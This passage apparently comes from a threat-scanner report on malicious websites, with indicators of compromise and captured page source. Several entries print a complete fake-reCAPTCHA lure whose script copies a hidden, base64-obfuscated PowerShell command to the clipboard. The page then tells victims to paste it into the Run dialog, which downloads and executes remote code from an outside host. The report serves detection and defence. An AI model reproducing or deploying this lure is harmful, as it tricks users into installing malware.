font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://finocci.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://www.finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://www.finocci.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://www.website.mypetapp.co.za/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.website.mypetapp.co.za/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.lucprofessional.grupomoltz.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: 